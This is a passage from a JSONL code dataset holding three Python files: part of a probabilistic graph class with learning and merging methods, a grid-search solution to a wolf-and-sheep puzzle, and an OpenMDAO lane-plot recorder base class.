dict:\n \"\"\"\n represents graphs as a dictionary\n :return: dictionary with keys: edges, nodes, uid, directional\n \"\"\"\n graph_dict = {'nodes': deepcopy(self.nodes),\n 'edges': deepcopy(self.edges),\n 'edgeTypes': deepcopy(self.edgeTypes),\n 'directional': self.directional,\n 'normalised': self.normalised,\n 'uid': self.uid,\n 'embedded_graphs': deepcopy(self.embedded_graphs),\n 'amgraph': True}\n\n for node_key in self.embedded_graphs:\n for attr in self.embedded_graphs[node_key]:\n if denormaliser is not None:\n graph_dict['nodes'][node_key][attr] = denormaliser.denormalise(graph=graph_dict['nodes'][node_key][attr]).to_dict(denormaliser=denormaliser)\n graph_dict['normalised'] = False\n else:\n graph_dict['nodes'][node_key][attr] = graph_dict['nodes'][node_key][attr].to_dict()\n\n return graph_dict\n\n def set_node(self,\n node: Union[NodeKey, NodeId],\n timestamp: Optional[float] = None,\n **node_attributes) -> NodeKey:\n\n if isinstance(node, tuple):\n node_key = get_node_key(node_id=node)\n node_id = node\n else:\n node_key = node\n node_id = get_node_id(node_key=node)\n\n if timestamp is None:\n ts = time.time()\n else:\n ts = timestamp\n\n if node_key not in self.nodes:\n self.nodes[node_key] = {'_type': node_id[0],\n '_uid': node_id[1],\n '_created': ts,\n '_updated': None,\n '_edges': set(),\n '_community': None,\n '_changed': False}\n\n else:\n self.nodes[node_key]['_updated'] = ts\n self.nodes[node_key]['_changed'] = True\n\n if len(node_attributes) > 0:\n self.nodes[node_key].update(**node_attributes)\n\n # keep track of any attributes that are embedded graphs\n #\n for attr in node_attributes:\n if isinstance(node_attributes[attr], AMGraph):\n if node_key not in self.embedded_graphs:\n self.embedded_graphs[node_key] = {attr}\n else:\n self.embedded_graphs[node_key].add(attr)\n\n return node_key\n\n def set_edge(self,\n triple: Union[TripleKey, TripleId],\n source_attr: Optional[dict] = None,\n target_attr: Optional[dict] = None,\n prob: float = 1.0,\n numeric: Optional[float] = None,\n audit: bool = False,\n timestamp: Optional[float] = None,\n **edge_attributes\n ):\n\n if timestamp is None:\n ts = time.time()\n else:\n ts = timestamp\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n # keep track of edge types\n #\n self.edgeTypes.add(triple_id[1][0])\n\n # add nodes if necessary\n #\n if source_attr is not None:\n source_key = self.set_node(node=triple_id[0], timestamp=ts, **source_attr)\n else:\n source_key = self.set_node(node=triple_id[0], timestamp=ts)\n\n if target_attr is not None:\n target_key = self.set_node(node=triple_id[2], timestamp=ts, **target_attr)\n else:\n target_key = self.set_node(node=triple_id[2], timestamp=ts)\n\n if audit and triple_key in self.edges:\n\n # construct an expired triple_id\n #\n expired_triple_id = (triple_id[0], (triple_id[1][0], triple_id[1][1], ts), triple_id[2])\n expired_edge_key = get_triple_key(triple_id=expired_triple_id, directional=self.directional)\n\n # copy over attributes\n #\n self.edges[expired_edge_key] = deepcopy(self.edges[triple_key])\n\n # update the attributes\n #\n self.edges[expired_edge_key]['_changed'] = True\n self.edges[expired_edge_key]['_updated'] = ts\n self.edges[expired_edge_key]['_expired'] = ts\n add_new_edge = True\n\n elif triple_key in self.edges:\n\n add_new_edge = False\n\n # update the attributes\n #\n self.edges[triple_key]['_updated'] = ts\n self.edges[triple_key]['_changed'] = True\n self.edges[triple_key]['_prob'] = prob\n\n if numeric is not None:\n self.edges[triple_key]['_numeric'] = numeric\n\n if len(edge_attributes) > 0:\n self.edges[triple_key].updated(**edge_attributes)\n else:\n add_new_edge = True\n\n # add new edge if required\n #\n if add_new_edge:\n self.edges[triple_key] = {'_type': triple_id[1][0],\n '_uid': triple_id[1][1],\n '_source': source_key,\n '_target': target_key,\n '_prob': prob,\n '_numeric': numeric,\n '_created': ts,\n '_updated': None,\n '_expired': None,\n '_changed': False}\n\n if len(edge_attributes) > 0:\n self.edges[triple_key].update(**edge_attributes)\n\n # add edge to nodes\n #\n self.nodes[source_key]['_edges'].add(triple_key)\n if not self.directional:\n self.nodes[target_key]['_edges'].add(triple_key)\n\n return triple_key\n\n def remove_edge(self,\n triple: Union[TripleKey, TripleId],\n audit: bool = False):\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n if triple_key in self.edges:\n\n if audit:\n ts = time.time()\n\n # construct an expired triple_id\n #\n expired_triple_id = (triple_id[0], (triple_id[1][0], triple_id[1][1], ts), triple_id[2])\n expired_edge_key = get_triple_key(triple_id=expired_triple_id, directional=self.directional)\n\n self.edges[expired_edge_key] = deepcopy(self.edges[triple_key])\n self.edges[expired_edge_key]['_changed'] = True\n self.edges[expired_edge_key]['_updated'] = ts\n self.edges[expired_edge_key]['_expired'] = ts\n\n # remove edge from nodes\n #\n self.nodes[self.edges[triple_key]['_source']]['_edges'].discard(triple_key)\n if not self.directional:\n self.nodes[self.edges[triple_key]['_target']]['_edges'].discard(triple_key)\n \n # delete the edge\n #\n del self.edges[triple_key]\n\n # delete edgeType entry if all edges have been removed\n #\n if not audit and sum([1 for t_key in self.edges if self.edges[t_key]['_type'] == triple_id[1][0]]) == 0:\n self.edgeTypes.discard(triple_id[1][0])\n\n def remove_node(self, node: Union[NodeKey, NodeId]):\n\n if isinstance(node, tuple):\n node_key = get_node_key(node_id=node)\n else:\n node_key = node\n\n if node_key in self.nodes:\n\n # first delete any edges node has\n #\n triple_keys = list(self.nodes[node_key]['_edges'])\n for triple_key in triple_keys:\n self.remove_edge(triple=triple_key, audit=False)\n\n del self.nodes[node_key]\n\n if node_key in self.embedded_graphs:\n del self.embedded_graphs[node_key]\n\n def compare_graph(self, graph_to_compare=None, compare_edge_types: Optional[Set[EdgeType]] = None) -> Tuple[float, Por]:\n\n distance: float = 0.0\n numeric_dist: float\n prob_dist: float\n\n por: Por = {}\n\n # if graph_to_compare is None then set to an empty graph\n #\n if graph_to_compare is None:\n graph_to_compare = AMGraph()\n\n if compare_edge_types is not None:\n\n # get the edges to compare - ie the edge type is in compare_edge_types and edge is not expired\n #\n triples_to_compare = ({triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_type'] in compare_edge_types and self.edges[triple_key]['_expired'] is None} |\n {triple_key\n for triple_key in graph_to_compare.edges\n if graph_to_compare.edges[triple_key]['_type'] in compare_edge_types and graph_to_compare.edges[triple_key]['_expired'] is None})\n else:\n triples_to_compare = ({triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_expired'] is None} |\n {triple_key\n for triple_key in graph_to_compare.edges\n if graph_to_compare.edges[triple_key]['_expired'] is None})\n\n for triple_key in triples_to_compare:\n\n # default numeric_dist in case edge numeric is None\n #\n numeric_dist = 0.0\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_compare.edges:\n prob_dist = abs(self.edges[triple_key]['_prob'] - graph_to_compare.edges[triple_key]['_prob'])\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_compare.edges[triple_key]['_numeric'] is not None:\n numeric_dist = abs(self.edges[triple_key]['_numeric'] - graph_to_compare.edges[triple_key]['_numeric'])\n\n # if edge only in this graph\n #\n elif triple_key in self.edges:\n prob_dist = self.edges[triple_key]['_prob']\n\n if self.edges[triple_key]['_numeric'] is not None:\n numeric_dist = self.edges[triple_key]['_numeric']\n\n # if edge only in graph_to_compare\n #\n else:\n prob_dist = graph_to_compare.edges[triple_key]['_prob']\n\n if graph_to_compare.edges[triple_key]['_numeric'] is not None:\n numeric_dist = graph_to_compare.edges[triple_key]['_numeric']\n\n por[triple_key] = {'prob': prob_dist, 'numeric': numeric_dist}\n\n distance += pow(prob_dist, 2)\n\n distance += pow(numeric_dist, 2)\n\n distance = sqrt(distance)\n\n return distance, por\n\n def learn_graph(self, graph_to_learn=None, learn_rate: float = 1.0, learn_edge_types: Optional[Set[EdgeType]] = None, prune_threshold: float = 0.1, audit: bool = False):\n\n # if graph_to_lean is None then set to an empty graph\n #\n if graph_to_learn is None:\n graph_to_learn = AMGraph()\n\n if learn_edge_types is not None:\n\n # get the edges to compare - ie the edge type is in compare_edge_types and edge is not expired\n #\n exist_triples_to_learn = {triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_type'] in learn_edge_types and self.edges[triple_key]['_expired'] is None}\n triples_to_learn = (exist_triples_to_learn |\n {triple_key\n for triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_type'] in learn_edge_types and graph_to_learn.edges[triple_key]['_expired'] is None})\n else:\n exist_triples_to_learn = {triple_key\n for triple_key in self.edges\n if self.edges[triple_key]['_expired'] is None}\n triples_to_learn = (exist_triples_to_learn |\n {triple_key\n for triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_expired'] is None})\n\n # if no existing edges to learn then override learn rate to maximum (1.0)\n #\n if len(triples_to_learn) == 0:\n learn_rate = 1.0\n\n if audit:\n ts = time.time()\n else:\n ts = None\n\n triples_to_prune = set()\n\n for triple_key in triples_to_learn:\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_learn.edges:\n\n prob = self.edges[triple_key]['_prob'] + ((graph_to_learn.edges[triple_key]['_prob'] - self.edges[triple_key]['_prob']) * learn_rate)\n\n numeric = None\n\n if prob > prune_threshold:\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + ((graph_to_learn.edges[triple_key]['_numeric'] - self.edges[triple_key]['_numeric']) * learn_rate)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n else:\n triples_to_prune.add(triple_key)\n\n # if edge only in this graph\n #\n elif triple_key in self.edges:\n\n prob = self.edges[triple_key]['_prob'] + ((0.0 - self.edges[triple_key]['_prob']) * learn_rate)\n\n numeric = None\n\n if prob > prune_threshold:\n\n if self.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + ((0.0 - self.edges[triple_key]['_numeric']) * learn_rate)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n else:\n triples_to_prune.add(triple_key)\n\n # if edge only in graph_to_learn\n #\n else:\n prob = (graph_to_learn.edges[triple_key]['_prob']) * learn_rate\n\n numeric = None\n\n if prob > prune_threshold:\n\n if graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_learn.edges[triple_key]['_numeric'] * learn_rate\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # now copy over triples not learnt and not expired\n #\n if learn_edge_types is not None:\n triples_to_copy = {triple_key\n for triple_key in graph_to_learn.edges\n if graph_to_learn.edges[triple_key]['_type'] not in learn_edge_types and graph_to_learn.edges[triple_key]['_expired'] is None}\n\n for triple_key in triples_to_copy:\n\n prob = graph_to_learn.edges[triple_key]['_prob'] * learn_rate\n\n if graph_to_learn.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_learn.edges[triple_key]['_numeric'] * learn_rate\n else:\n numeric = None\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # now prune triples\n #\n for triple_key in triples_to_prune:\n self.remove_edge(triple=triple_key, audit=audit)\n\n def learn_edge(self, triple: Union[TripleKey, TripleId], learn_rate, numeric: Optional[float] = None, prune_threshold: float = 0.0, audit: bool = False) -> TripleKey:\n\n if isinstance(triple, tuple):\n triple_id = triple\n triple_key = get_triple_key(triple_id=triple, directional=self.directional)\n else:\n triple_id = get_triple_id(triple_key=triple)\n triple_key = triple\n\n source_key = get_node_key(node_id=triple_id[0])\n if source_key not in self.nodes:\n self.set_edge(triple=triple, prob=1.0, numeric=numeric, audit=audit)\n else:\n triples_to_process = {existing_triple_key\n for existing_triple_key in self.nodes[source_key]['_edges']\n if self.edges[existing_triple_key]['_type'] == triple_id[1][0] and self.edges[existing_triple_key]['_expired'] is None}\n\n triples_to_process.add(triple_key)\n triples_to_prune = set()\n\n for triple_key_to_process in triples_to_process:\n if triple_key_to_process != triple_key:\n\n # weaken the probability of this edge and reduce numeric closer to 0.0\n #\n existing_prob = self.edges[triple_key_to_process]['_prob'] + ((0.0 - self.edges[triple_key_to_process]['_prob']) * learn_rate)\n\n if existing_prob > prune_threshold:\n if self.edges[triple_key_to_process]['_numeric'] is not None:\n existing_numeric = self.edges[triple_key_to_process]['_numeric'] + ((0.0 - self.edges[triple_key_to_process]['_numeric']) * learn_rate)\n else:\n existing_numeric = None\n\n self.set_edge(triple=triple_key_to_process, prob=existing_prob, numeric=existing_numeric, audit=audit)\n\n else:\n triples_to_prune.add(triple_id)\n\n else:\n if triple_key_to_process in self.edges:\n new_prob = self.edges[triple_key_to_process]['_prob'] + ((1.0 - self.edges[triple_key_to_process]['_prob']) * learn_rate)\n if numeric is not None and self.edges[triple_key_to_process]['_numeric'] is not None:\n new_numeric = self.edges[triple_key_to_process]['_numeric'] + ((numeric - self.edges[triple_key_to_process]['_numeric']) * learn_rate)\n else:\n new_numeric = numeric\n else:\n\n # if there are more than 1 in triples_to_process this means edges for the correct type already exist and prob = learn_rate\n #\n if len(triples_to_process) > 1:\n new_prob = learn_rate\n if numeric is not None:\n new_numeric = numeric * learn_rate\n else:\n new_numeric = None\n\n # else probability needs to start from 1.0\n #\n else:\n new_prob = 1.0\n new_numeric = numeric\n\n self.set_edge(triple=triple_key_to_process, prob=new_prob, numeric=new_numeric, audit=audit)\n # now prune triples\n #\n for triple_key in triples_to_prune:\n self.remove_edge(triple=triple_key, audit=audit)\n\n return triple_key\n\n def merge_graph(self, graph_to_merge, weight: float = 1.0, audit: bool = False):\n\n triples_to_merge = {triple_key\n for triple_key in graph_to_merge.edges\n if graph_to_merge.edges[triple_key]['_expired'] is None}\n\n if audit:\n ts = time.time()\n else:\n ts = None\n\n for triple_key in triples_to_merge:\n\n # if edge in both graphs\n #\n if triple_key in self.edges and triple_key in graph_to_merge.edges:\n\n prob = self.edges[triple_key]['_prob'] + (graph_to_merge.edges[triple_key]['_prob'] * weight)\n\n numeric = None\n\n if self.edges[triple_key]['_numeric'] is not None and graph_to_merge.edges[triple_key]['_numeric'] is not None:\n numeric = self.edges[triple_key]['_numeric'] + (graph_to_merge.edges[triple_key]['_numeric'] * weight)\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n # if edge only in this graph\n #\n elif triple_key in graph_to_merge.edges:\n\n prob = (graph_to_merge.edges[triple_key]['_prob']) * weight\n\n numeric = None\n\n if graph_to_merge.edges[triple_key]['_numeric'] is not None:\n numeric = graph_to_merge.edges[triple_key]['_numeric'] * weight\n\n self.set_edge(triple=triple_key, audit=audit, timestamp=ts, numeric=numeric, prob=prob)\n\n def diff_graph(self, graph_to_diff):\n\n for triple_key in graph_to_diff.edges:\n if triple_key in self.edges:\n if graph_to_diff.edges[triple_key]['_numeric'] is not None:\n if self.edges[triple_key]['_numeric'] is not None:\n self.edges[triple_key]['_numeric'] = self.edges[triple_key]['_numeric'] - graph_to_diff.edges[triple_key]['_numeric']\n else:\n self.edges[triple_key]['_numeric'] = -graph_to_diff.edges[triple_key]['_numeric']\n elif graph_to_diff.edges[triple_key]['_numeric'] is not None:\n self.set_edge(triple=triple_key, numeric=-graph_to_diff.edges[triple_key]['_numeric'])\n\n def rename_triples(self, postfix_edge_uid=None):\n\n for exist_triple_key in list(self.edges):\n\n exist_triple_id = get_triple_id(triple_key=exist_triple_key)\n new_triple = deepcopy(self.edges[exist_triple_key])\n\n new_triple['_uid'] = f'{new_triple[\"_uid\"]}_{postfix_edge_uid}'\n new_triple_id = (exist_triple_id[0], (new_triple['_type'], new_triple['_uid'], new_triple['_expired']), exist_triple_id[2])\n new_triple_key = get_triple_key(triple_id=new_triple_id, directional=self.directional)\n\n del self.edges[exist_triple_key]\n self.edges[new_triple_key] = new_triple\n\n self.nodes[new_triple['_source']]['_edges'].discard(exist_triple_key)\n self.nodes[new_triple['_source']]['_edges'].add(new_triple_key)\n if not self.directional:\n self.nodes[new_triple['_target']]['_edges'].discard(exist_triple_key)\n self.nodes[new_triple['_target']]['_edges'].add(new_triple_key)\n\n def get_sub_graphs(self, generalise: bool = False):\n sub_graphs = []\n if self.directional:\n for node_key in self.nodes:\n if len(self.nodes[node_key]['_edges']) > 0:\n graph = AMGraph(directional=True)\n\n if generalise:\n source_id = (self.nodes[node_key]['_type'], '*')\n else:\n source_id = (self.nodes[node_key]['_type'], self.nodes[node_key]['_uid'])\n\n for edge_key in self.nodes[node_key]['_edges']:\n edge_id = (self.edges[edge_key]['_type'], self.edges[edge_key]['_uid'], self.edges[edge_key]['_expired'])\n target_id = (self.nodes[self.edges[edge_key]['_target']]['_type'], self.nodes[self.edges[edge_key]['_target']]['_uid'])\n graph.set_edge(triple=(source_id, edge_id, target_id),\n prob=self.edges[edge_key]['_prob'],\n numeric=self.edges[edge_key]['_numeric'])\n sub_graphs.append((self.nodes[node_key]['_type'], graph))\n\n return sub_graphs\n\n def calc_communities(self, community_edge_type: EdgeType, weight_field='_numeric', inverse=False):\n if len(self.edges) > 1:\n nx_graph = nx.MultiGraph()\n distances = [self.edges[triple_key][weight_field] for triple_key in self.edges if self.edges[triple_key]['_type'] == community_edge_type]\n min_distance = min(distances)\n max_distance = max(distances)\n for triple_key in self.edges:\n if self.edges[triple_key]['_type'] == community_edge_type and self.edges[triple_key]['_expired'] is None:\n weight = (self.edges[triple_key][weight_field] - min_distance) / (max_distance - min_distance)\n if inverse:\n weight = 1 - weight\n nx_graph.add_edge(self.edges[triple_key]['_source'], self.edges[triple_key]['_target'], weight=weight)\n\n communities = list(nx.algorithms.community.greedy_modularity_communities(nx_graph, weight='weight'))\n for c_idx in range(len(communities)):\n for node_key in communities[c_idx]:\n self.nodes[node_key]['_community'] = c_idx\n\n\nif __name__ == '__main__':\n\n from src.normalise_amgraph import NormaliseAMGraph\n\n g1 = AMGraph(directional=True)\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200)\n\n g1.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=False)\n\n g1.remove_node(node=('A', '1'))\n\n g1.remove_node(node=('B', '2'))\n\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200, audit=True)\n\n g1.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), muneric=400, audit=True)\n\n g1.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=True)\n\n g2 = AMGraph(directional=False)\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200)\n\n g2.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=False)\n\n g2.remove_node(node=('A', '1'))\n\n g2.remove_node(node=('B', '2'))\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=200, audit=True)\n\n g2.set_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), numeric=400, audit=True)\n\n g2.remove_edge(triple=(('A', '1'), ('HAS_B', None, None), ('B', '2')), audit=True)\n\n g3 = AMGraph(directional=True)\n\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g3.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=100)\n\n g4 = AMGraph(directional=True)\n\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g4.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=200)\n\n normaliser = NormaliseAMGraph()\n g3n, new_min_max = normaliser.normalise(graph=g3)\n g4n, new_min_max = normaliser.normalise(graph=g4)\n\n distance = g3n.compare_graph(graph_to_compare=g4n)\n\n g3n1 = AMGraph(graph=g3n)\n\n g3n1.learn_graph(graph_to_learn=g4n, learn_rate=0.7)\n g3n1d = normaliser.denormalise(graph=g3n1)\n\n g3n1.learn_graph(graph_to_learn=g4n, learn_rate=0.7)\n g3n1d = normaliser.denormalise(graph=g3n1)\n\n g5 = AMGraph()\n g5.merge_graph(graph_to_merge=g3n, weight=0.5)\n g5d = normaliser.denormalise(graph=g5)\n\n g5.merge_graph(graph_to_merge=g4n, weight=0.5)\n g5d = normaliser.denormalise(graph=g5)\n\n g6 = AMGraph()\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '2')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '2')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '3')), learn_rate=0.7)\n g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '3')), learn_rate=0.7)\n\n g7 = AMGraph(directional=True)\n g7.set_edge(triple=(('TRADE', '1'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n g7.set_edge(triple=(('TRADE', '1'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n g7.set_edge(triple=(('PLATFORM', 'A'), ('HAS_CHANNEL', None, None), ('CHANNEL', 'Electronic')))\n\n sub_graphs = g7.get_sub_graphs()\n\n sub_graphs_g = g7.get_sub_graphs(generalise=True)\n\n g8 = AMGraph()\n g8.set_node(node=('NEURON', '1'), a_graph=g3n1)\n\n jg8n = g8.to_dict()\n jg8dn = g8.to_dict(denormaliser=normaliser)\n\n g9 = AMGraph()\n g9.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=200)\n\n stm = AMGraph(graph=g9)\n ltm = AMGraph(graph=g9)\n\n g10 = AMGraph()\n g10.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=100)\n\n stm.learn_graph(graph_to_learn=g10, learn_rate=0.7)\n ltm.learn_graph(graph_to_learn=g10, learn_rate=0.4)\n\n dg = AMGraph(graph=stm)\n dg.diff_graph(graph_to_diff=ltm)\n dg.rename_triples(postfix_edge_uid='lstm')\n\n dg.merge_graph(graph_to_merge=g10, weight=1.0)\n\n\n print('finished')\n","sub_path":"src/am_graph.py","file_name":"am_graph.py","file_ext":"py","file_size_in_byte":35777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"97447355","text":"import sys\n\nM, N = map(int, sys.stdin.readline().strip().split())\n\nmaps = []\nfor _ in range(M):\n maps.append(list(sys.stdin.readline().strip()))\n\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0, 0]\n\n\ndef find(i, j):\n for k in range(4):\n if i + dx[k] < 0 or i + dx[k] >= M:\n continue\n if j + dy[k] < 0 or j + dy[k] >= N:\n continue\n\n cur = maps[i + dx[k]][j + dy[k]]\n if cur == 'S':\n print(0)\n exit()\n elif cur in ['W', 'D']:\n continue\n else:\n maps[i + dx[k]][j + dy[k]] = 'D'\n\n\nfor i in range(M):\n for j in range(N):\n if maps[i][j] == 'W':\n find(i, j)\n\nprint(1)\nfor m in maps:\n print(''.join(m))\n","sub_path":"backjoon/Graph/16956_늑대와_양.py","file_name":"16956_늑대와_양.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"394230226","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright 2017 D. de Vries\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nThis file contains the definition of the `BaseLanePlotter` class.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport abc\nfrom abc import abstractmethod\n\nimport matplotlib.colors as colors\nimport numpy as np\nfrom matplotlib import ticker as ticker\nfrom matplotlib.figure import Figure\nfrom openmdao.core.driver import Driver\nfrom typing import Optional\n\nfrom .base_iteration_plotter import BaseIterationPlotter\n\n\nclass BaseLanePlotter(BaseIterationPlotter):\n \"\"\"Specialized `BaseIterationPlotter` wrapping a ``lane plot`` style visualization of variables.\n\n Abstract base class enabling OpenMDAO data to be visualized using colored, horizontal lanes. Each variable to be\n visualized this way has its own lane. The x-axis corresponds to the number of iterations/function evaluations. A\n colorbar is used to indicate the value of a design variable.\n\n Attributes\n ----------\n n_vars : int\n The number variables.\n\n var_names : :obj:`list` of :obj:`str`\n List of all variable names.\n\n xs, ys, cs: :obj:`np.ndarray`\n Arrays containing the x-, y-, and color data of the figure.\n\n iter : int\n Number of the last iteration.\n\n ax : :obj:`Axes`\n Matplotlib `Axes` of the plot.\n\n max_iter : int\n Maximum number of iterations.\n\n quad : :obj:`matplotlib.collections.QuadMesh`\n Instance of `QuadMesh` that represents the actual plot.\n\n vmin, vmax : float\n Lower and upper cutoff for values along the colorbar.\n\n cmap : str\n Name of the colormap to use.\n\n norm : :obj:`colors.Normalize`, optional\n Which normalization scheme to use for the colorbar.\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n def __init__(self, vmin=0., vmax=1., cmap='viridis', norm=None):\n # type: (float, float, str, Optional[colors.Normalize]) -> None\n \"\"\"Initialize a new `BaseLanePlotter` instance.\n\n Parameters\n ----------\n vmin, vmax : float\n Lower and upper cutoff for the values along the colorbar.\n\n cmap : str('viridis')\n Name of the colormap to use for the plot.\n\n norm : :obj:`colors.Normalize`, optional\n Instance of `colors.Normalize` can be supplied to use a normalization scheme for the colorbar.\n \"\"\"\n super(BaseLanePlotter, self).__init__()\n\n self.n_vars = None\n self.var_names = None\n\n self.xs = None\n self.ys = None\n self.cs = None\n\n self.iter = 0\n self.ax = None\n self.max_iter = 1000\n\n self.quad = None\n\n self.vmin = vmin\n self.vmax = vmax\n self.cmap = cmap\n self.norm = norm\n\n def startup(self, object_requesting_recording):\n # type: (Driver) -> None\n \"\"\"Make sure this `Recorder` is attached to a `Driver` and obtain the maximum number of iterations.\n\n Parameters\n ----------\n object_requesting_recording : :obj:`Driver`\n Instance of `Driver` to which this `Recorder` is attached.\n \"\"\"\n if not isinstance(object_requesting_recording, Driver):\n raise ValueError('This Recorder should be attached to a Driver.')\n\n if 'maxiter' in object_requesting_recording.options:\n self.max_iter = object_requesting_recording.options['maxiter']\n\n super(BaseLanePlotter, self).startup(object_requesting_recording)\n\n @abstractmethod\n def init_vars(self):\n # type: () -> None\n \"\"\"Initialize the variables of the plot.\n\n This method should be implemented by subclasses such that they can control how variables are initialized.\n \"\"\"\n raise NotImplementedError\n\n def init_fig(self, fig):\n # type: (Figure) -> None\n \"\"\"Initialize the figure, setting up axes, labels, the colorbar, etc.\n\n Parameters\n ----------\n fig : :obj:`Figure`\n Instance of the `Figure` which should be populated.\n \"\"\"\n self.init_vars()\n\n self.xs, self.ys = np.meshgrid(np.arange(0., self.max_iter+.5)-.5, np.arange(0., self.n_vars+.5)-.5)\n self.cs = np.zeros((self.n_vars, self.max_iter))\n\n self.ax = fig.add_subplot(111)\n self.ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))\n self.ax.yaxis.set_ticks(np.arange(0, self.n_vars))\n self.ax.yaxis.set_ticklabels(self.var_names)\n\n self.ax.set_xlim([-.5, .5])\n self.ax.set_ylim([-.5, self.n_vars-.5])\n self.quad = self.ax.pcolormesh(self.xs, self.ys, self.cs,\n vmin=self.vmin, vmax=self.vmax, cmap=self.cmap, norm=self.norm)\n\n fig.colorbar(self.quad)\n\n self.ax.set_xlabel('Evaluation #')\n\n @abstractmethod\n def _compute_new_data(self, desvars, responses, objectives, constraints, metadata):\n # type: (dict, dict, dict, dict, dict) -> np.ndarray\n \"\"\"Return a 1D numpy.ndarray containing the new data points.\n\n Parameters\n ----------\n desvars, responses, objectives, constraints, metadata : dict\n Dictionaries of the new design, response, objective, and constraint variables, as well as metadata.\n\n Returns\n -------\n np.ndarray\n A 1D numpy array containing the new data.\n \"\"\"\n raise NotImplementedError\n\n def _update_plot(self, *args):\n # type: (dict, dict, dict, dict, dict) -> None\n \"\"\"Insert the new data into the plot and refresh it.\n\n Parameters\n ----------\n desvars, responses, objectives, constraints, metadata : dict\n Dictionaries of the new design, response, objective, and constraint variables, as well as metadata.\n \"\"\"\n if len(args) != 5 and not any([isinstance(arg, dict) for arg in args]):\n raise ValueError('Illegal arguments for _update_plot of %s' % self.__name__)\n desvars, responses, objectives, constraints, metadata = args\n\n data = self._compute_new_data(desvars, responses, objectives, constraints, metadata)\n self.cs[:, self.iter] = data[:]\n self.quad.set_array(self.cs.ravel())\n self.ax.set_xlim([-.5, self.iter+.5])\n self.iter += 1\n","sub_path":"openlego/recorders/base_lane_plotter.py","file_name":"base_lane_plotter.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
